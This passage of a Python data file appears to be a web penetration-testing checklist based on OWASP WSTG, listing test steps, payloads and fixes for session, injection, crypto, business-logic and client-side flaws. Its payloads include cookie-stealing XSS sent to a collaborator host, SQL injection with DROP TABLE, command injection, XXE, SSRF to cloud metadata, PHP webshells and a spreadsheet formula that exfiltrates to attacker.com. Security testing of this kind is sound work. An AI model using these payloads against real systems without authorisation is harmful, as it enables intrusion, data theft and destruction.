     "expected_vulnerable":"Same session ID before and after login",
     "expected_safe":"New session ID generated on login",
     "remediation":"Call session_regenerate_id() after successful authentication",
     "h1_pattern_ids":["session_fixation"]},

    {"id":"WSTG-SESS-04","category":"Session Management","name":"Test Exposed Session Variables",
     "objective":"Test for session variable exposure","applies_when":["has_login"],
     "severity":"medium","owasp_top10":["A02:2021"],"burp_applicable":True,
     "manual_steps":["Check if session data in URL (PHPSESSID in URL)",
                      "Check log files for session tokens","Check for session in GET parameters",
                      "Test session in Referer header exposure"],
     "payloads":[],"expected_vulnerable":"Session token in URL, logs, or GET params",
     "expected_safe":"Session only in cookie, never in URL or logs",
     "remediation":"Never pass session tokens in URLs","h1_pattern_ids":[]},

    {"id":"WSTG-SESS-05","category":"Session Management","name":"Test CSRF",
     "objective":"Test Cross-Site Request Forgery protection","applies_when":["has_login"],
     "severity":"high","owasp_top10":["A01:2021"],"burp_applicable":True,
     "manual_steps":["Check for CSRF token in state-changing forms",
                      "Test if token is validated server-side (try with no token)",
                      "Test if token is user-specific (use another user's token)",
                      "Check SameSite cookie attribute",
                      "Test CSRF on JSON API endpoints (change Content-Type)"],
     "payloads":["<form action='TARGET/profile' method='POST'><input name='email' value='evil@evil.com'></form>"],
     "expected_vulnerable":"State-changing action performed without CSRF token",
     "expected_safe":"CSRF token required and validated on all state-changing requests",
     "remediation":"Implement anti-CSRF tokens (synchronizer pattern or double-submit cookie)",
     "h1_pattern_ids":["csrf"]},

    {"id":"WSTG-SESS-06","category":"Session Management","name":"Test Logout Functionality",
     "objective":"Test if logout properly invalidates session","applies_when":["has_login"],
     "severity":"medium","owasp_top10":["A07:2021"],"burp_applicable":True,
     "manual_steps":["Capture session token before logout","Logout from application",
                      "Try using captured token after logout",
                      "Check if token invalidated server-side",
                      "Test logout from all devices functionality"],
     "payloads":[],"expected_vulnerable":"Session token still valid after logout",
     "expected_safe":"Session immediately invalidated server-side on logout",
     "remediation":"Destroy session server-side on logout, not just client-side",
     "h1_pattern_ids":[]},

    {"id":"WSTG-SESS-07","category":"Session Management","name":"Test Session Timeout",
     "objective":"Test session timeout implementation","applies_when":["has_login"],
     "severity":"low","owasp_top10":["A07:2021"],"burp_applicable":True,
     "manual_steps":["Login and remain idle for session timeout period",
                      "Test if session expires after timeout",
                      "Check if timeout is absolute or idle-based",
                      "Verify sensitive apps have short timeout (15-30 min)"],
     "payloads":[],"expected_vulnerable":"Session never expires or timeout > 24 hours",
     "expected_safe":"Session expires after 30 min of inactivity (or application-appropriate)",
     "remediation":"Set appropriate session timeout based on sensitivity","h1_pattern_ids":[]},

    {"id":"WSTG-SESS-08","category":"Session Management","name":"Test Session Puzzling",
     "objective":"Test for session confusion vulnerabilities","applies_when":["has_login"],
     "severity":"medium","owasp_top10":["A07:2021"],"burp_applicable":True,
     "manual_steps":["Test if session variables reused in different contexts",
                      "Check if partial authentication shares session with full auth",
                      "Test concurrent session handling"],
     "payloads":[],"expected_vulnerable":"Session data confusion between different auth states",
     "expected_safe":"Fresh session for each authentication context",
     "remediation":"Separate session contexts for different authentication levels",
     "h1_pattern_ids":[]},

    # ═══════════════════════════════════════════════════
    # INPUT VALIDATION (WSTG-INPV) — MOST CRITICAL
    # ═══════════════════════════════════════════════════
    {"id":"WSTG-INPV-01","category":"Input Validation","name":"Test Reflected XSS",
     "objective":"Test for Reflected Cross-Site Scripting","applies_when":["has_forms","always"],
     "severity":"high","owasp_top10":["A03:2021"],"burp_applicable":True,
     "manual_steps":["Test all GET/POST parameters with XSS probes",
                      "Check if input reflected in response without encoding",
                      "Test error pages, search fields, URL parameters",
                      "Test in different contexts: HTML, JS, attribute, URL"],
     "payloads":["<script>alert(1)</script>","<img src=x onerror=alert(1)>",
                 "'\"><script>alert(document.domain)</script>",
                 "javascript:alert(1)","<svg onload=alert(1)>",
                 "<body onload=alert(1)>","\" onmouseover=\"alert(1)"],
     "expected_vulnerable":"XSS payload executes in browser",
     "expected_safe":"All special characters HTML-encoded in output",
     "remediation":"Output encode all user-supplied data, implement CSP",
     "h1_pattern_ids":["xss_reflected"]},

    {"id":"WSTG-INPV-02","category":"Input Validation","name":"Test Stored XSS",
     "objective":"Test for Stored Cross-Site Scripting","applies_when":["has_forms"],
     "severity":"critical","owasp_top10":["A03:2021"],"burp_applicable":True,
     "manual_steps":["Store XSS payload in user-input fields (name, bio, comment, etc.)",
                      "Retrieve stored data and check if payload executes",
                      "Test admin panels that display user data",
                      "Test notification systems, email templates"],
     "payloads":["<script>alert(document.cookie)</script>",
                 "<img src=x onerror=fetch('https://COLLAB/?c='+document.cookie)>",
                 "<svg/onload=alert(1)>","<details open ontoggle=alert(1)>"],
     "expected_vulnerable":"Stored XSS payload executes when page loaded",
     "expected_safe":"All stored HTML entities properly encoded",
     "remediation":"HTML encode on output, sanitize HTML input with allowlist",
     "h1_pattern_ids":["xss_stored"]},

    {"id":"WSTG-INPV-03","category":"Input Validation","name":"Test HTTP Verb Tampering",
     "objective":"Test HTTP method tampering for auth bypass",
     "applies_when":["always"],"severity":"medium","owasp_top10":["A01:2021"],
     "burp_applicable":True,
     "manual_steps":["Change GET to POST and vice versa on protected endpoints",
                      "Try HEAD, OPTIONS on protected resources",
                      "Test X-HTTP-Method-Override header",
                      "Test _method parameter: ?_method=DELETE"],
     "payloads":["X-HTTP-Method-Override: DELETE","X-HTTP-Method-Override: PUT",
                 "_method=DELETE","_method=PUT"],
     "expected_vulnerable":"Auth bypass or unintended action via verb tampering",
     "expected_safe":"Method checked alongside auth on all routes",
     "remediation":"Validate HTTP method in authorization logic","h1_pattern_ids":[]},

    {"id":"WSTG-INPV-04","category":"Input Validation","name":"Test HTTP Parameter Pollution",
     "objective":"Test parameter pollution for bypass","applies_when":["always"],
     "severity":"medium","owasp_top10":["A03:2021"],"burp_applicable":True,
     "manual_steps":["Send duplicate parameters: ?id=1&id=2",
                      "Test in body and URL simultaneously",
                      "Test on security controls: ?admin=false&admin=true",
                      "Try comma-separated: ?id=1,2"],
     "payloads":["?id=1&id=2","?admin=false&admin=true","?role=user&role=admin"],
     "expected_vulnerable":"Server processes unexpected parameter combination",
     "expected_safe":"Consistent single-value handling","remediation":"Use first or last value consistently",
     "h1_pattern_ids":["parameter_pollution"]},

    {"id":"WSTG-INPV-05","category":"Input Validation","name":"Test SQL Injection",
     "objective":"Test for SQL Injection vulnerabilities","applies_when":["always"],
     "severity":"critical","owasp_top10":["A03:2021"],"burp_applicable":True,
     "manual_steps":["Test all parameters with: ' \" -- ; ) ( 1 OR 1=1",
                      "Check for error messages revealing SQL syntax",
                      "Test time-based blind: ' AND SLEEP(5)--",
                      "Test boolean-based blind: ' AND 1=1-- vs ' AND 1=2--",
                      "Use sqlmap: sqlmap -u 'URL' --batch --level=3"],
     "payloads":["'","\"","' OR '1'='1","' OR 1=1--","' AND SLEEP(5)--",
                 "1' ORDER BY 1--","1 UNION SELECT NULL--","admin'--",
                 "'; DROP TABLE users--","' AND 1=CONVERT(int,@@version)--"],
     "expected_vulnerable":"SQL error, different response for 1=1 vs 1=2, time delay",
     "expected_safe":"Parameterized queries, no SQL errors exposed",
     "remediation":"Use prepared statements/parameterized queries everywhere",
     "h1_pattern_ids":["sqli"]},

    {"id":"WSTG-INPV-06","category":"Input Validation","name":"Test LDAP Injection",
     "objective":"Test for LDAP injection","applies_when":["always"],
     "severity":"high","owasp_top10":["A03:2021"],"burp_applicable":True,
     "manual_steps":["Test login with LDAP injection: admin)(&(password=*))",
                      "Test search fields with: *)(|(objectclass=*)",
                      "Check for LDAP error messages"],
     "payloads":["admin)(&(password=*)","*)(|(objectclass=*)","*)(uid=*))(|(uid=*"],
     "expected_vulnerable":"LDAP query logic altered by input",
     "expected_safe":"LDAP input properly escaped","remediation":"Escape special LDAP characters",
     "h1_pattern_ids":[]},

    {"id":"WSTG-INPV-07","category":"Input Validation","name":"Test XML Injection",
     "objective":"Test for XML/XPath injection","applies_when":["always"],
     "severity":"high","owasp_top10":["A03:2021"],"burp_applicable":True,
     "manual_steps":["Test XML input fields with: <test>","Test XPath injection in login",
                      "Test XXE with external entity","Try blind XXE via OOB"],
     "payloads":["<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><foo>&xxe;</foo>",
                 "' or '1'='1","x' or name()='username' or 'x'='y"],
     "expected_vulnerable":"File contents returned, XPath logic bypassed",
     "expected_safe":"XML/XPath injection blocked","remediation":"Disable external entities, use XPath parameterization",
     "h1_pattern_ids":["xxe"]},

    {"id":"WSTG-INPV-08","category":"Input Validation","name":"Test SSI Injection",
     "objective":"Test Server-Side Includes injection","applies_when":["always"],
     "severity":"high","owasp_top10":["A03:2021"],"burp_applicable":True,
     "manual_steps":["Test SSI in form fields: <!--#exec cmd='id'-->",
                      "Test in filename parameters","Check if response includes SSI output"],
     "payloads":["<!--#exec cmd='id'-->","<!--#echo var='DATE_LOCAL'-->",
                 "<!--#include virtual='/etc/passwd'-->"],
     "expected_vulnerable":"Command output in response","expected_safe":"SSI tags treated as literal text",
     "remediation":"Disable SSI or validate input before including","h1_pattern_ids":[]},

    {"id":"WSTG-INPV-09","category":"Input Validation","name":"Test XPath Injection",
     "objective":"Test XPath injection in XML-based auth","applies_when":["always"],
     "severity":"high","owasp_top10":["A03:2021"],"burp_applicable":True,
     "manual_steps":["Test login: ' or '1'='1","Test: x' or name()='username","Check for XML errors"],
     "payloads":["' or '1'='1","x' or name()='username' or 'x'='y","'] | //user | a['"],
     "expected_vulnerable":"XPath query returns all users / bypass auth",
     "expected_safe":"Input properly escaped before XPath query","remediation":"Use XPath parameterization",
     "h1_pattern_ids":[]},

    {"id":"WSTG-INPV-10","category":"Input Validation","name":"Test IMAP/SMTP Injection",
     "objective":"Test email function injection","applies_when":["always"],
     "severity":"medium","owasp_top10":["A03:2021"],"burp_applicable":True,
     "manual_steps":["Test email fields with CRLF injection",
                      "Try: user@domain.com%0d%0aCC:victim@evil.com",
                      "Test in contact forms","Test newsletter subscription"],
     "payloads":["test@test.com%0d%0aBcc:attacker@evil.com",
                 "test@test.com\r\nCC:attacker@evil.com",
                 "test%40test.com%0a%0d"],
     "expected_vulnerable":"Additional email headers injected","expected_safe":"CRLF stripped from email params",
     "remediation":"Strip CR/LF from email inputs","h1_pattern_ids":[]},

    {"id":"WSTG-INPV-11","category":"Input Validation","name":"Test Code Injection",
     "objective":"Test for code execution via injection","applies_when":["always"],
     "severity":"critical","owasp_top10":["A03:2021"],"burp_applicable":True,
     "manual_steps":["Test eval() sinks with: system('id'), os.system('id')",
                      "Test template injection: {{7*7}}, ${7*7}, <%= 7*7 %>",
                      "Test in URL parameters, form fields, headers",
                      "Check for SSTI (Server-Side Template Injection)"],
     "payloads":["{{7*7}}","${7*7}","<%= 7*7 %>","{{config}}","{{self.__class__.__mro__[2].__subclasses__()}}",
                 "#{7*7}","*{7*7}","${{7*7}}"],
     "expected_vulnerable":"Math expression evaluated (49 returned), config/objects dumped",
     "expected_safe":"Template expressions treated as literal text",
     "remediation":"Use sandboxed template engines, never eval user input",
     "h1_pattern_ids":["ssti","rce"]},

    {"id":"WSTG-INPV-12","category":"Input Validation","name":"Test Command Injection",
     "objective":"Test OS command injection","applies_when":["always"],
     "severity":"critical","owasp_top10":["A03:2021"],"burp_applicable":True,
     "manual_steps":["Find params used in system calls: ping, host, nslookup, convert",
                      "Test: ; id, | id, && id, $(id), `id`",
                      "Test blind: ; sleep 5, | sleep 5",
                      "Test in filename, IP, domain, port fields"],
     "payloads":["; id","| id","&& id","$(id)","`id`","; sleep 5","| sleep 5",
                 "; cat /etc/passwd","& ping -n 5 127.0.0.1"],
     "expected_vulnerable":"Command output in response or time delay",
     "expected_safe":"User input never passed to shell","remediation":"Never pass user input to shell, use APIs",
     "h1_pattern_ids":["rce","command_injection"]},

    {"id":"WSTG-INPV-13","category":"Input Validation","name":"Test Buffer Overflow",
     "objective":"Test for buffer overflow conditions","applies_when":["always"],
     "severity":"critical","owasp_top10":["A06:2021"],"burp_applicable":True,
     "manual_steps":["Send very long strings (>1000 chars) in all parameters",
                      "Test especially in older apps, C/C++ backends",
                      "Check for crash, 500 errors, service restart"],
     "payloads":["A"*1000,"A"*5000,"A"*10000],
     "expected_vulnerable":"Application crashes or behaves unexpectedly with long input",
     "expected_safe":"Input length validated, graceful error handling",
     "remediation":"Implement input length validation","h1_pattern_ids":[]},

    {"id":"WSTG-INPV-14","category":"Input Validation","name":"Test Incubated Vulnerability",
     "objective":"Test for stored/delayed injections","applies_when":["has_forms"],
     "severity":"high","owasp_top10":["A03:2021"],"burp_applicable":True,
     "manual_steps":["Store potentially malicious input and check if processed later",
                      "Test import features with malicious files",
                      "Test scheduled jobs processing user data",
                      "Test email/notification templates with user content"],
     "payloads":[],"expected_vulnerable":"Injection triggered later in different context",
     "expected_safe":"All stored data sanitized before processing",
     "remediation":"Sanitize data at both input and output stages","h1_pattern_ids":[]},

    {"id":"WSTG-INPV-15","category":"Input Validation","name":"Test HTTP Splitting/Smuggling",
     "objective":"Test HTTP request smuggling","applies_when":["always"],
     "severity":"high","owasp_top10":["A03:2021"],"burp_applicable":True,
     "manual_steps":["Test Content-Length vs Transfer-Encoding conflict (CL.TE)",
                      "Test Transfer-Encoding vs Content-Length (TE.CL)",
                      "Use Burp HTTP Request Smuggler extension",
                      "Test CRLF injection in headers"],
     "payloads":["Transfer-Encoding: chunked\r\nContent-Length: 4\r\n\r\n0\r\n\r\n"],
     "expected_vulnerable":"Desync attack possible, different responses from frontend/backend",
     "expected_safe":"Consistent HTTP parsing on all layers",
     "remediation":"Use HTTP/2, normalize requests at reverse proxy",
     "h1_pattern_ids":["http_request_smuggling"]},

    {"id":"WSTG-INPV-16","category":"Input Validation","name":"Test HTTP Incoming Requests",
     "objective":"Test header injection vulnerabilities","applies_when":["always"],
     "severity":"medium","owasp_top10":["A03:2021"],"burp_applicable":True,
     "manual_steps":["Test Host header injection","Test X-Forwarded-Host injection",
                      "Test CRLF injection in headers","Check for cache poisoning via headers"],
     "payloads":["Host: evil.com","X-Forwarded-Host: evil.com","X-Host: evil.com",
                 "X-Forwarded-For: 127.0.0.1"],
     "expected_vulnerable":"Response reflects injected host, password reset email uses evil host",
     "expected_safe":"Host header validated against allowlist",
     "remediation":"Validate Host header against configured domain",
     "h1_pattern_ids":["host_header_injection"]},

    {"id":"WSTG-INPV-17","category":"Input Validation","name":"Test Local File Inclusion",
     "objective":"Test LFI and RFI vulnerabilities","applies_when":["always"],
     "severity":"critical","owasp_top10":["A03:2021"],"burp_applicable":True,
     "manual_steps":["Find file inclusion params: ?page=, ?file=, ?template=, ?include=",
                      "Test LFI: ?page=../../../etc/passwd",
                      "Test with null byte: ?file=../../../etc/passwd%00",
                      "Test PHP wrappers: ?page=php://filter/convert.base64-encode/resource=index",
                      "Test RFI: ?page=http://evil.com/shell.txt"],
     "payloads":["../../../etc/passwd","../../../etc/passwd%00",
                 "php://filter/convert.base64-encode/resource=index.php",
                 "php://input","file:///etc/passwd",
                 "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4="],
     "expected_vulnerable":"File contents returned or RCE achieved",
     "expected_safe":"File inclusion not possible via user input",
     "remediation":"Never use user input in file includes, use allowlist",
     "h1_pattern_ids":["lfi","rfi","path_traversal"]},

    {"id":"WSTG-INPV-18","category":"Input Validation","name":"Test Remote File Inclusion",
     "objective":"Test for remote file inclusion","applies_when":["php_detected"],
     "severity":"critical","owasp_top10":["A03:2021"],"burp_applicable":True,
     "manual_steps":["Test ?file=http://attacker.com/shell.txt",
                      "Test ?page=ftp://attacker.com/shell.txt",
                      "Check allow_url_include PHP setting effect"],
     "payloads":["http://evil.com/shell.txt","ftp://evil.com/shell.txt",
                 "http://127.0.0.1/shell.txt"],
     "expected_vulnerable":"Remote file executed or fetched",
     "expected_safe":"allow_url_include disabled","remediation":"Disable allow_url_include in PHP config",
     "h1_pattern_ids":["rfi"]},

    {"id":"WSTG-INPV-19","category":"Input Validation","name":"Test SSRF",
     "objective":"Test Server-Side Request Forgery","applies_when":["always"],
     "severity":"critical","owasp_top10":["A10:2021"],"burp_applicable":True,
     "manual_steps":["Find URL parameters: ?url=, ?endpoint=, ?host=, ?webhook=, ?callback=",
                      "Test for internal access: ?url=http://127.0.0.1/admin",
                      "Test cloud metadata: ?url=http://169.254.169.254/latest/meta-data/",
                      "Test blind SSRF with Burp Collaborator",
                      "Test via redirect: ?url=http://redirector/?target=169.254.169.254"],
     "payloads":["http://127.0.0.1/","http://localhost/","http://169.254.169.254/latest/meta-data/",
                 "http://metadata.google.internal/","http://192.168.0.1/",
                 "http://[::1]/","file:///etc/passwd","dict://127.0.0.1:6379/INFO"],
     "expected_vulnerable":"Internal service response returned, cloud metadata exposed",
     "expected_safe":"URL allowlist enforced, no internal network access",
     "remediation":"Implement URL allowlist, disable redirects, use egress filtering",
     "h1_pattern_ids":["ssrf"]},

    # ═══════════════════════════════════════════════════
    # ERROR HANDLING (WSTG-ERRH)
    # ═══════════════════════════════════════════════════
    {"id":"WSTG-ERRH-01","category":"Error Handling","name":"Test Improper Error Handling",
     "objective":"Test if errors reveal sensitive information","applies_when":["always"],
     "severity":"low","owasp_top10":["A05:2021"],"burp_applicable":True,
     "manual_steps":["Trigger errors: SQL syntax, invalid types, overflow",
                      "Check if stack traces in response","Check for database error messages",
                      "Test with special characters, very long input, wrong content-type"],
     "payloads":["'","\"","{{}}","${{}}", "<>", "null","undefined","NaN",
                 "' OR 1=1--","../../../"],
     "expected_vulnerable":"Stack trace, DB errors, server paths in response",
     "expected_safe":"Generic error page, no technical details",
     "remediation":"Implement custom error pages, log errors server-side only",
     "h1_pattern_ids":["info_disclosure"]},

    {"id":"WSTG-ERRH-02","category":"Error Handling","name":"Test Stack Traces",
     "objective":"Test for detailed exception disclosure","applies_when":["always"],
     "severity":"low","owasp_top10":["A05:2021"],"burp_applicable":True,
     "manual_steps":["Force exceptions by manipulating data types",
                      "Send empty/null required parameters",
                      "Trigger 500 errors and examine response",
                      "Check debug mode indicators"],
     "payloads":[],"expected_vulnerable":"Full stack trace with file paths and code shown",
     "expected_safe":"Generic 500 error page","remediation":"Disable debug mode in production",
     "h1_pattern_ids":["info_disclosure"]},

    # ═══════════════════════════════════════════════════
    # WEAK CRYPTOGRAPHY (WSTG-CRYP)
    # ═══════════════════════════════════════════════════
    {"id":"WSTG-CRYP-01","category":"Weak Cryptography","name":"Test Weak Transport Layer Security",
     "objective":"Test TLS/SSL configuration","applies_when":["always"],
     "severity":"medium","owasp_top10":["A02:2021"],"burp_applicable":False,
     "manual_steps":["Run testssl.sh against target","Check for SSLv2/v3, TLS 1.0/1.1",
                      "Check for weak ciphers (RC4, DES, NULL)",
                      "Check certificate validity and trust chain",
                      "Test for BEAST, POODLE, DROWN, ROBOT attacks"],
     "payloads":[],"expected_vulnerable":"TLS 1.0 or weak ciphers accepted",
     "expected_safe":"TLS 1.2+ only, strong ciphers only",
     "remediation":"Disable TLS 1.0/1.1, configure strong cipher suites","h1_pattern_ids":[]},

    {"id":"WSTG-CRYP-02","category":"Weak Cryptography","name":"Test Padding Oracle",
     "objective":"Test for padding oracle vulnerabilities","applies_when":["always"],
     "severity":"high","owasp_top10":["A02:2021"],"burp_applicable":True,
     "manual_steps":["Identify encrypted tokens in cookies/params",
                      "Use padbuster or PadBuster tool",
                      "Test CBC mode encryption with predictable IVs",
                      "Check ASP.NET ViewState for encryption"],
     "payloads":[],"expected_vulnerable":"Different response for valid vs invalid padding",
     "expected_safe":"Consistent error response, authenticated encryption (GCM)",
     "remediation":"Use AEAD (AES-GCM), not CBC mode","h1_pattern_ids":[]},

    {"id":"WSTG-CRYP-03","category":"Weak Cryptography","name":"Test Sensitive Information via Unencrypted Channels",
     "objective":"Test for data transmitted unencrypted","applies_when":["always"],
     "severity":"high","owasp_top10":["A02:2021"],"burp_applicable":True,
     "manual_steps":["Use Wireshark to capture traffic","Check if sensitive data over HTTP",
                      "Test API endpoints over HTTP","Check for mixed content on HTTPS pages"],
     "payloads":[],"expected_vulnerable":"Credentials or PII transmitted over HTTP",
     "expected_safe":"All sensitive data encrypted in transit",
     "remediation":"Force HTTPS for all endpoints with HSTS","h1_pattern_ids":[]},

    {"id":"WSTG-CRYP-04","category":"Weak Cryptography","name":"Test Weak Encryption",
     "objective":"Test for weak encryption algorithms","applies_when":["always"],
     "severity":"medium","owasp_top10":["A02:2021"],"burp_applicable":True,
     "manual_steps":["Check password reset tokens (should be random, not time-based)",
                      "Check for MD5/SHA1 hashed passwords (check known hashes)",
                      "Test for ECB mode (identical blocks in ciphertext)",
                      "Check JWT algorithm: none, HS256 with RS keys"],
     "payloads":['{"alg":"none"}','{"alg":"HS256"}'],
     "expected_vulnerable":"Weak hashing (MD5/SHA1), predictable tokens, JWT alg:none",
     "expected_safe":"bcrypt/Argon2 for passwords, cryptographic tokens",
     "remediation":"Use bcrypt/Argon2, reject JWT with alg:none","h1_pattern_ids":["jwt_issues"]},

    # ═══════════════════════════════════════════════════
    # BUSINESS LOGIC (WSTG-BUSL)
    # ═══════════════════════════════════════════════════
    {"id":"WSTG-BUSL-01","category":"Business Logic","name":"Test Business Logic Data Validation",
     "objective":"Test if business rules enforced server-side","applies_when":["always"],
     "severity":"medium","owasp_top10":["A04:2021"],"burp_applicable":True,
     "manual_steps":["Test negative values: price=-1, quantity=-1",
                      "Test zero values: amount=0","Test very large numbers",
                      "Test step skipping in multi-step processes",
                      "Test if price validation client-side only"],
     "payloads":["amount=-1","price=0","quantity=99999999","discount=100"],
     "expected_vulnerable":"Negative amounts accepted, client-side only validation",
     "expected_safe":"Server-side validation for all business rules",
     "remediation":"Validate all business rules server-side","h1_pattern_ids":["business_logic"]},

    {"id":"WSTG-BUSL-02","category":"Business Logic","name":"Test Ability to Forge Requests",
     "objective":"Test if server-side validation can be forged","applies_when":["always"],
     "severity":"high","owasp_top10":["A04:2021"],"burp_applicable":True,
     "manual_steps":["Modify hidden form fields (price, discount, user_id)",
                      "Change user role in request","Modify JWT payload",
                      "Test parameter tampering on all business flows"],
     "payloads":[],"expected_vulnerable":"Server accepts forged business data (price, role, etc.)",
     "expected_safe":"Server validates all business data independently",
     "remediation":"Never trust client-supplied business data","h1_pattern_ids":["mass_assignment"]},

    {"id":"WSTG-BUSL-03","category":"Business Logic","name":"Test Integrity Checks",
     "objective":"Test data integrity across transactions","applies_when":["always"],
     "severity":"high","owasp_top10":["A04:2021"],"burp_applicable":True,
     "manual_steps":["Test race conditions: concurrent coupon usage",
                      "Test double-spend: submit payment twice rapidly",
                      "Test workflow bypass: skip steps in checkout",
                      "Test referral abuse: refer yourself"],
     "payloads":[],"expected_vulnerable":"Race condition allows double discount/spend",
     "expected_safe":"Atomic transactions, idempotent operations","remediation":"Use database transactions and locking",
     "h1_pattern_ids":["race_condition"]},

    {"id":"WSTG-BUSL-04","category":"Business Logic","name":"Test Process Timing",
     "objective":"Test for race conditions and time-of-check-time-of-use",
     "applies_when":["always"],"severity":"high","owasp_top10":["A04:2021"],
     "burp_applicable":True,
     "manual_steps":["Use Burp Turbo Intruder for race conditions",
                      "Send 20 simultaneous requests to use one-time coupon",
                      "Test: register with same email simultaneously",
                      "Test: withdraw beyond balance simultaneously"],
     "payloads":[],"expected_vulnerable":"Multiple requests succeed that should only succeed once",
     "expected_safe":"Database-level locking prevents race conditions",
     "remediation":"Use atomic DB operations, distributed locks","h1_pattern_ids":["race_condition"]},

    {"id":"WSTG-BUSL-05","category":"Business Logic","name":"Test Number of Times a Function Can Be Used",
     "objective":"Test function usage limits","applies_when":["always"],
     "severity":"medium","owasp_top10":["A04:2021"],"burp_applicable":True,
     "manual_steps":["Test: use promo code multiple times",
                      "Test: access trial features after trial ends",
                      "Test: rate limit bypass via IP rotation"],
     "payloads":[],"expected_vulnerable":"One-time functions usable multiple times",
     "expected_safe":"Server-side tracking of usage count","remediation":"Track usage server-side with atomic operations",
     "h1_pattern_ids":[]},

    {"id":"WSTG-BUSL-06","category":"Business Logic","name":"Test Workflow Circumvention",
     "objective":"Test for workflow step bypass","applies_when":["always"],
     "severity":"high","owasp_top10":["A04:2021"],"burp_applicable":True,
     "manual_steps":["In multi-step checkout: jump directly to confirmation",
                      "Skip payment step in e-commerce flow",
                      "Access next step URL directly without completing current",
                      "Test order completion without paying"],
     "payloads":[],"expected_vulnerable":"Can skip payment or verification steps",
     "expected_safe":"Each step validates previous step completion",
     "remediation":"Track workflow state server-side","h1_pattern_ids":[]},

    {"id":"WSTG-BUSL-07","category":"Business Logic","name":"Test Defenses Against Application Misuse",
     "objective":"Test anti-automation and misuse protection","applies_when":["always"],
     "severity":"low","owasp_top10":["A04:2021"],"burp_applicable":False,
     "manual_steps":["Test scraping protections","Test brute force protections",
                      "Test CAPTCHA bypass","Test rate limiting effectiveness"],
     "payloads":[],"expected_vulnerable":"No bot protection, automated abuse possible",
     "expected_safe":"CAPTCHA, rate limiting, bot detection in place",
     "remediation":"Implement rate limiting, CAPTCHA for sensitive operations","h1_pattern_ids":[]},

    {"id":"WSTG-BUSL-08","category":"Business Logic","name":"Test Upload of Unexpected File Types",
     "objective":"Test file upload for malicious file types",
     "applies_when":["has_file_upload"],"severity":"critical","owasp_top10":["A04:2021"],
     "burp_applicable":True,
     "manual_steps":["Upload PHP/ASP/JSP webshell","Try: shell.php, shell.php5, shell.phtml",
                      "Try: shell.php.jpg (double extension)","Try: shell.php%00.jpg (null byte)",
                      "Test SVG with XSS payload","Test HTML file upload",
                      "Try changing Content-Type to image/jpeg while uploading .php"],
     "payloads":["<?php system($_GET['cmd']); ?>","<?php phpinfo(); ?>",
                 "<svg onload=alert(document.domain)>",
                 "GIF89a<?php system($_GET['cmd']); ?>"],
     "expected_vulnerable":"Webshell uploaded and accessible/executable",
     "expected_safe":"Only allowed file types accepted, stored outside webroot",
     "remediation":"Validate MIME type + extension, rename files, store outside webroot",
     "h1_pattern_ids":["file_upload_rce"]},

    {"id":"WSTG-BUSL-09","category":"Business Logic","name":"Test Upload of Malicious Files",
     "objective":"Test for malicious file content handling",
     "applies_when":["has_file_upload"],"severity":"high","owasp_top10":["A04:2021"],
     "burp_applicable":True,
     "manual_steps":["Upload CSV with formula injection: =cmd|' /C calc'!A0",
                      "Upload XML with XXE payload","Upload PDF with embedded JS",
                      "Upload ZIP with path traversal (zip slip): ../../evil.php"],
     "payloads":['=cmd|" /C calc"!A0','=IMPORTXML(CONCAT("http://attacker.com/?", INDIRECT("RC",FALSE)),"//.*")'],
     "expected_vulnerable":"Malicious file content processed or executed",
     "expected_safe":"File content sanitized or only safe processing",
     "remediation":"Sanitize file content, use safe libraries for parsing",
     "h1_pattern_ids":["file_upload_xxe","csv_injection"]},

    # ═══════════════════════════════════════════════════
    # CLIENT-SIDE TESTING (WSTG-CLNT)
    # ═══════════════════════════════════════════════════
    {"id":"WSTG-CLNT-01","category":"Client-Side Testing","name":"Test DOM XSS",
     "objective":"Test for DOM-based Cross-Site Scripting","applies_when":["always"],
     "severity":"high","owasp_top10":["A03:2021"],"burp_applicable":True,
     "manual_steps":["Review JS source for dangerous sinks: innerHTML, eval, document.write",
                      "Test URL hash manipulation: /#<script>alert(1)</script>",
                      "Test URL parameter in DOM: ?q=<svg onload=alert(1)>",
                      "Test postMessage handlers","Use DOM Invader (Burp)"],
     "payloads":["#<img src=x onerror=alert(1)>","#<script>alert(1)</script>",
                 "javascript:alert(1)","data:text/html,<script>alert(1)</script>"],
     "expected_vulnerable":"XSS executes via DOM manipulation",
     "expected_safe":"No dangerous DOM sinks with user-controlled data",
     "remediation":"Use textContent instead of innerHTML, sanitize before DOM insertion",
     "h1_pattern_ids":["xss_dom"]},

    {"id":"WSTG-CLNT-02","category":"Client-Side Testing","name":"Test JavaScript Execution",
     "objective":"Test for unsafe JavaScript execution","applies_when":["always"],
     "severity":"medium","owasp_top10":["A03:2021"],"burp_applicable":False,
     "manual_steps":["Check for eval() with user input","Check for Function() constructor",
                      "Review setTimeout/setInterval with string args","Test JSON.parse with unvalidated input"],
     "payloads":[],"expected_vulnerable":"eval() or similar with user data",
     "expected_safe":"No dynamic code execution with user input",
     "remediation":"Never use eval() with user data, use JSON.parse","h1_pattern_ids":["xss_dom"]},

    {"id":"WSTG-CLNT-03","category":"Client-Side Testing","name":"Test HTML Injection",
     "objective":"Test for HTML injection in client-side code","applies_when":["has_forms"],
     "severity":"medium","owasp_top10":["A03:2021"],"burp_applicable":True,
     "manual_steps":["Test input fields with HTML tags: <b>test</b>",
                      "Check if HTML rendered in responses","Test in error messages, welcome messages"],
     "payloads":["<b>test</b>","<h1>test</h1>","<a href=javascript:alert(1)>click</a>"],
     "expected_vulnerable":"HTML tags rendered in browser",
     "expected_safe":"HTML entities encoded in output","remediation":"HTML encode all output",
     "h1_pattern_ids":["xss_reflected"]},

    {"id":"WSTG-CLNT-04","category":"Client-Side Testing","name":"Test Client-Side URL Redirect",
     "objective":"Test for open redirect vulnerabilities","applies_when":["always"],
     "severity":"medium","owasp_top10":["A01:2021"],"burp_applicable":True,
     "manual_steps":["Find redirect parameters: ?next=, ?redirect=, ?url=, ?goto=, ?return=",
                      "Test: ?next=https://evil.com","Test: ?next=//evil.com",
                      "Test: ?redirect=javascript:alert(1)",
                      "Test after login redirect"],
     "payloads":["https://evil.com","//evil.com","///evil.com","////evil.com",
                 "https:evil.com","https://target.com.evil.com","javascript:alert(1)"],
     "expected_vulnerable":"Redirected to external URL without validation",
     "expected_safe":"Only relative redirects or validated absolute URLs",
     "remediation":"Use allowlist for redirect destinations or relative paths only",
     "h1_pattern_ids":["open_redirect"]},

    {"id":"WSTG-CLNT-05","category":"Client-Side Testing","name":"Test CSS Injection",
